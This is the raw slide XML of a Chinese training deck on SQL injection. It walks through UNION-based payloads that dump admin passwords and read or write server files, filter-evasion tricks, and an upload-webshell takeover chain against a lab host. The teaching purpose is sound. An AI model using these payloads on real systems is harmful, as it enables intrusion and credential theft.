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59" r:id="rId7"/>
    <p:sldId id="268" r:id="rId8"/>
    <p:sldId id="284" r:id="rId9"/>
    <p:sldId id="292" r:id="rId10"/>
    <p:sldId id="267" r:id="rId11"/>
    <p:sldId id="285" r:id="rId12"/>
    <p:sldId id="287" r:id="rId13"/>
    <p:sldId id="286" r:id="rId14"/>
    <p:sldId id="290" r:id="rId15"/>
    <p:sldId id="301" r:id="rId16"/>
    <p:sldId id="306" r:id="rId17"/>
    <p:sldId id="302" r:id="rId18"/>
    <p:sldId id="307" r:id="rId19"/>
    <p:sldId id="308" r:id="rId20"/>
    <p:sldId id="309" r:id="rId21"/>
    <p:sldId id="294" r:id="rId22"/>
    <p:sldId id="291" r:id="rId23"/>
    <p:sldId id="28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54965d8-8c9a-40dc-8c9b-a1a33fe7bddf}">
          <p14:sldIdLst>
            <p14:sldId id="256"/>
            <p14:sldId id="257"/>
            <p14:sldId id="266"/>
            <p14:sldId id="259"/>
            <p14:sldId id="268"/>
            <p14:sldId id="284"/>
            <p14:sldId id="292"/>
            <p14:sldId id="267"/>
            <p14:sldId id="285"/>
            <p14:sldId id="287"/>
            <p14:sldId id="286"/>
            <p14:sldId id="290"/>
            <p14:sldId id="291"/>
            <p14:sldId id="306"/>
            <p14:sldId id="283"/>
            <p14:sldId id="307"/>
            <p14:sldId id="294"/>
            <p14:sldId id="309"/>
            <p14:sldId id="308"/>
            <p14:sldId id="302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9.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png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6600" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="6600" dirty="0"/>
              <a:t>注入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164336"/>
            <a:ext cx="9144000" cy="529459"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p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From:   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陈婉萍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516380" y="1034415"/>
            <a:ext cx="91674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、判断数据库系统 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and (select count(*) from sysobjects)&gt;0 mssql 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and (select count(*) from msysobjects)&gt;0 access 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500380" y="1034415"/>
            <a:ext cx="109607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、猜解</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200">
                <a:latin typeface="楷体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="楷体" panose="02010609060101010101" charset="-122"/>
              </a:rPr>
              <a:t>的数目</a:t>
            </a:r>
            <a:endParaRPr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sz="2800">
                <a:latin typeface="楷体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="楷体" panose="02010609060101010101" charset="-122"/>
              </a:rPr>
              <a:t>http://10.10.10.130/0/Production/PRODUCT_DETAIL.asp?id=1138 order by 22</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="楷体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="楷体" panose="02010609060101010101" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr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、猜解表名【联合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UNION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查询】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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://10.10.10.130/0/Production/PRODUCT_DETAIL.asp?id=1138 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin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500380" y="1034415"/>
            <a:ext cx="109607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sz="3200">
                <a:latin typeface="楷体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="楷体" panose="02010609060101010101" charset="-122"/>
              </a:rPr>
              <a:t>猜解列名 </a:t>
            </a:r>
            <a:endParaRPr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sz="3200">
                <a:latin typeface="楷体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="楷体" panose="02010609060101010101" charset="-122"/>
              </a:rPr>
              <a:t>http://10.10.10.130/0/Production/PRODUCT_DETAIL.asp?id=1138 UNION SELECT 1,2,admin,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22 from admin </a:t>
            </a:r>
            <a:endParaRPr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sz="3200">
                <a:latin typeface="楷体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="楷体" panose="02010609060101010101" charset="-122"/>
              </a:rPr>
              <a:t>得到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admin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（管理员）的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password(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密码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7705" y="2664460"/>
            <a:ext cx="7683500" cy="4063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715" y="516255"/>
            <a:ext cx="7591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后续：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进入后台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——&gt;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上传图片木马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——&gt;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		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菜刀连接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——&gt;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				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上传大马拿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webshell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410210" y="426085"/>
            <a:ext cx="434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以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1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php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1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+mysql5.0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为例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845" y="1130300"/>
            <a:ext cx="5274945" cy="4016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210" y="1800225"/>
            <a:ext cx="63779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1、判断注入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2、判断字段长度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3、报错注入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317500" y="349885"/>
            <a:ext cx="109607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Mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1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报错函数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" b="1">
              <a:solidFill>
                <a:srgbClr val="FFC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 sz="3600" b="1">
              <a:solidFill>
                <a:srgbClr val="FFC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1、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system_user() 系统用户名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2、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user() 用户名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3、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current_user 当前用户名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4、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session_user()连接数据库的用户名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5、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database() 数据库名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6、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version() MYSQL数据库版本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7、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load_file() MYSQL读取本地文件的函数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8、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@@datadir 读取数据库路径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9、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@@basedir MYSQL 安装路径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10、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@@version_compile_os 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0890" y="729615"/>
            <a:ext cx="1139126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information_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200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？</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200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SCHEMA_NAME表示数据库名称                   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				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TABLE_NAME表示表的名称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					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COLUMN_NAME表示字段名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、爆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表名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select 1,group_concat(table_name),3,4,5 from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="楷体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="楷体" panose="02010609060101010101" charset="-122"/>
              </a:rPr>
              <a:t>information_schema.tables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where table_schema=0x68706F6C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、表中字段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名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select 1,2,3,COLUMN_NAME,4,5 from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information_schema.COLUMNS where TABLE_NAME=0x61646D696E6973747261746F72 limit 1,1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、获取管理员账号/密码（有可能加密了）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select 1,2,3,name,5,password,7,8 from user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32485" y="514350"/>
            <a:ext cx="8173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应用：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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loadfile &amp; into outfile</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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30" y="1221105"/>
            <a:ext cx="120681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、判断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and (select count(*) from mysql.user)&gt;0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loadfile()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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http://www.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.com/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.php?id=1 union select 1,2,3,load_file(c:\boot.ini)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http://www.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.com/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.php?id=1 union select  1,2,3,load_file(0x633A5C626F6F742E696E69)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http://www.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.com/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**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.php?id=1 union select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1,2,3,load_file(char(99,58,92,98,111,111,116,46,105,110,105))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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>into outfile()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http://www.**.com/**.php?id=1* union select 1,2,3,char(.....) into outfile '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物理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路径名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'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4205" y="386715"/>
            <a:ext cx="8413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Mysql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绕过防注入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795" y="1308735"/>
            <a:ext cx="115335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1、编码处理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Urlencode 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ASCII：char(xxx)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2、语句变换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【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select password from users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convert(int,select password from users)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declare @pw varchar(1000) set @pw=0×70617373776F7264; select @pw form users【十六进制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3、其他【假设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过滤select，无法执行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】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s%e%l%e%c%t password from users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   通过%连接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sel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+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ect” password from users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 通过+来连接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或者  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)(         ''       ”“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工具简介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86340" cy="4351655"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/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啊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注入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明小子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sqlmap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等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574800"/>
            <a:ext cx="2397125" cy="94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百度百科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193800"/>
            <a:ext cx="10515600" cy="5171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所谓SQL注入，就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。具体来说，它是利用现有应用程序，将（恶意的）SQL命令注入到后台数据库引擎执行的能力，它可以通过在Web表单中输入（恶意）SQL语句得到一个存在安全漏洞的网站上的数据库，而不是按照设计者意图去执行SQL语句。比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的，这类表单特别容易受到SQL注入式攻击．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5250" y="2000250"/>
            <a:ext cx="8413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视频演示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5590" y="3891915"/>
            <a:ext cx="6109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永远不要信任用户的输入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n w="3175">
                  <a:noFill/>
                </a:ln>
              </a:rPr>
              <a:t>THANK YOU</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0">
              <a:ln w="3175">
                <a:noFill/>
              </a:ln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09207" y="393536"/>
            <a:ext cx="2411160" cy="9104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1394409" y="1981200"/>
            <a:ext cx="4011506" cy="901042"/>
            <a:chOff x="563829" y="1930400"/>
            <a:chExt cx="3508638" cy="677334"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="69" name="矩形 68"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId3"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="563829" y="1930400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A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/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1018039" y="1930400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rgbClr val="FEFFFF"/>
                  </a:solidFill>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>sql</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FEFFFF"/>
                  </a:solidFill>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>注入原理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5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6823659" y="1981200"/>
            <a:ext cx="4011506" cy="901042"/>
            <a:chOff x="563829" y="3107267"/>
            <a:chExt cx="3508638" cy="677334"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="72" name="矩形 71"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId6"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="563829" y="3107267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B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7"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1018039" y="3107267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rgbClr val="FEFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>数据库结构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8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1394409" y="3483660"/>
            <a:ext cx="4011506" cy="901042"/>
            <a:chOff x="563829" y="4284134"/>
            <a:chExt cx="3508638" cy="677334"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="75" name="矩形 74"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId9"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="563829" y="4284134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C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6" name="任意多边形 75"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId10"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1018039" y="4284134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rgbClr val="FEFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>数据库分类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7" name="组合 76"/>
          <p:cNvGrpSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId11"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1394409" y="4986126"/>
            <a:ext cx="4011506" cy="901042"/>
            <a:chOff x="563829" y="5461001"/>
            <a:chExt cx="3508638" cy="677334"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="78" name="矩形 77"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId12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E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/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId13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rgbClr val="FEFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>工具简介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14"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6823659" y="3483662"/>
            <a:ext cx="4011506" cy="901042"/>
            <a:chOff x="563829" y="5461001"/>
            <a:chExt cx="3508638" cy="677334"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="81" name="矩形 80"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId15"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="563829" y="5461001"/>
              <a:ext cx="1728000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>
              <a:normAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FEFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>D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/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId16"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1018039" y="5461001"/>
              <a:ext cx="3054428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rgbClr val="FEFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>注入过程讲解</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFFFF"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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zh-CN" alt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注入原理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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305"/>
            <a:ext cx="4165600" cy="3966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在地址链接上出现参数传递值，而传递值可自定义，攻击者对传递值进行恶意修改达到操作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</a:rPr>
              <a:t>SQL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数据库的方法。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</a:rPr>
              <a:t>当参数值能够影响网站的数据库，那么就会产生sql注入漏洞。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379855"/>
            <a:ext cx="7123430" cy="3858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28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产生注入条件：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975360" y="1253490"/>
            <a:ext cx="107365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必须要有参数传递，参数和数据库进行交汇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http://10.10.10.130/0/Production/PRODUCT_DETAIL.asp?id=1142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http://10.10.10.130/0/Production/PRODUCT_DETAIL.asp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http://10.10.10.130/0/news_info.asp?newsid=196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数据库结构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8689340" y="1375410"/>
            <a:ext cx="3293745" cy="51428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数据库后缀名：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*.mdb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打开数据库工具：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列名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表名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数据内容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rot="5400000">
            <a:off x="4365938" y="3555687"/>
            <a:ext cx="3460124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内容占位符 9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81000" y="1354455"/>
            <a:ext cx="8147050" cy="4507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340" y="2086610"/>
            <a:ext cx="3175000" cy="29546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 b="1"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" b="1"/>
              <a:t>注入分类</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" b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0" y="1193165"/>
            <a:ext cx="10086340" cy="5052695"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:no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Access+asp注入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Mysql+php注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="32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Mssql注入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Oracle注入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postgresql注入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66215" y="766464"/>
            <a:ext cx="9512300" cy="1376362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>注入过程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4625" y="3031490"/>
            <a:ext cx="44831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以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1"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</a:rPr>
              <a:t>asp+access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为例</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" b="1"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http://10.10.10.130/0/Production/PRODUCT_DETAIL.asp?id=1138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</a:rPr>
              <a:t>access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注入主要是得管理员账号密码，进网站管理后台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2602865"/>
            <a:ext cx="6819265" cy="4018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360" y="1253490"/>
            <a:ext cx="104197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、判断是否有注入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url后添加“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'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”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and 1=1【判断是否带入查询，如果显示正常说明没有带入查询，存在注入】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and 1=2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4"/>
  <p:tag name="KSO_WM_UNIT_PRESET_TEXT_LEN" val="114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20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36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11"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160555"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1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3"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160555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3_1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom160555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40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2"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom16055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5_3*i*3"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="160555"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="3"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag46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5"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_SLIDE_ID" val="custom16055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1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2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3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4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5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6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555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28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THANK YOU"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag63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5"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_SLIDE_ID" val="custom160555_28"/>
  <p:tag name="KSO_WM_SLIDE_INDEX" val="28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宽屏</PresentationFormat>
  <Paragraphs>187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楷体</vt:lpstr>
      <vt:lpstr>黑体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>1_Office 主题</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>百度百科</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>数据库结构</vt:lpstr>
      <vt:lpstr>SQL注入分类</vt:lpstr>
      <vt:lpstr>SQL注入过程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工具简介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</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-06-07T02:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-06-09T14:27:39Z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